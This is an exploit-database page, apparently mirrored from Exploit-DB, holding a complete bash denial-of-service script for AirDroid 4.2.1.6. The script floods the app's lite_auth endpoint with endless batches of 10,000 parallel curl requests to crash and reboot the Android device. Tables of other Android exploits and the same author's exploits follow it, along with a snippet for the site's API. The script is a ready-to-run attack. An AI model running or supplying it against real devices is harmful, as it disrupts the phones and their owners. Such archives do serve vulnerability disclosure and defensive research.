Become a patron and gain access to the dashboard, Schedule scans, API and Search patron
"AirDroid 4.2.1.6 - Denial of Service"
Author
s4vitar
Platform
android
Release date
2019-02-11
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 | #!/bin/bash # ********************************************************************* # * Author: Marcelo Vázquez (aka s4vitar) * # * AirDroid Denial of Service (DoS) & System Crash + Forced Reboot * # ********************************************************************* # Exploit Title: AirDroid Remote Denial of Service (DoS) & System Crash + Forced Reboot # Date: 2019-02-13 # Exploit Author: Marcelo Vázquez (aka s4vitar) # Collaborators: Victor Lasa (aka vowkin) # Vendor Homepage: https://web.airdroid.com/ # Software Link: https://play.google.com/store/apps/details?id=com.sand.airdroid&hl=en # Version: <= AirDroid 4.2.1.6 # Tested on: Android url=$1 # Example: http://192.168.1.46:8888 requests=0 trap ctrl_c INT # If Ctrl+C key is pressed then the threads are killed function ctrl_c() { echo -e "\n\n[*]Exiting...\n" && tput cnorm pkill curl > /dev/null 2>&1 exit } # Detect number of arguments being passed to the program if [ "$(echo $#)" == "1" ]; then # Infinite Loop tput cnorm && while true; do # We send 10000 requests in thread for i in $(seq 1 10000); do curl --silent "$url/sdctl/comm/lite_auth/" & let requests+=1 done && wait # Here we wait for the threads to finish echo "Requests Sent: $requests" done else echo -e "\nUsage: ./AirDroid_request.sh http://ip:port\n" fi |
| Release Date | Title | Type | Platform | Author |
|---|---|---|---|---|
| 2020-07-02 | "WhatsApp Remote Code Execution - Paper" | webapps | android | "ashu Jaiswal" |
| 2020-02-24 | "Android Binder - Use-After-Free (Metasploit)" | local | android | Metasploit |
| 2020-01-14 | "Android - ashmem Readonly Bypasses via remap_file_pages() and ASHMEM_UNPIN" | dos | android | "Google Security Research" |
| 2020-01-14 | "WeChat - Memory Corruption in CAudioJBM::InputAudioFrameToJBM" | dos | android | "Google Security Research" |
| 2019-11-08 | "Android Janus - APK Signature Bypass (Metasploit)" | local | android | Metasploit |
| 2019-10-16 | "Whatsapp 2.19.216 - Remote Code Execution" | remote | android | "Valerio Brussani" |
| 2019-10-04 | "Android - Binder Driver Use-After-Free" | local | android | "Google Security Research" |
| 2019-08-30 | "Canon PRINT 2.5.5 - Information Disclosure" | local | android | 0x48piraj |
| 2019-07-24 | "Android 7 < 9 - Remote Code Execution" | remote | android | "Marcin Kozlowski" |
| 2019-07-15 | "Android 7 - 9 VideoPlayer - 'ihevcd_parse_pps' Out-of-Bounds Write" | dos | android | "Marcin Kozlowski" |
| Release Date | Title | Type | Platform | Author |
|---|---|---|---|---|
| 2019-10-16 | "X.Org X Server 1.20.4 - Local Stack Overflow" | local | linux | s4vitar |
| 2019-06-14 | "CentOS 7.6 - 'ptrace_scope' Privilege Escalation" | local | linux | s4vitar |
| 2019-06-10 | "Ubuntu 18.04 - 'lxd' Privilege Escalation" | local | linux | s4vitar |
| 2019-03-15 | "NetData 1.13.0 - HTML Injection" | webapps | multiple | s4vitar |
| 2019-02-28 | "FTP Server 1.32 - Denial of Service" | dos | android | s4vitar |
| 2019-02-21 | "AirDrop 2.0 - Denial of Service (DoS)" | dos | android | s4vitar |
| 2019-02-21 | "ScreenStream 3.0.15 - Denial of Service" | dos | android | s4vitar |
| 2019-02-15 | "AirMore 1.6.1 - Denial of Service (PoC)" | dos | android | s4vitar |
| 2019-02-14 | "ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC)" | dos | android | s4vitar |
| 2019-02-11 | "AirDroid 4.2.1.6 - Denial of Service" | dos | android | s4vitar |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/46337/?format=json')
For full documentation follow the link above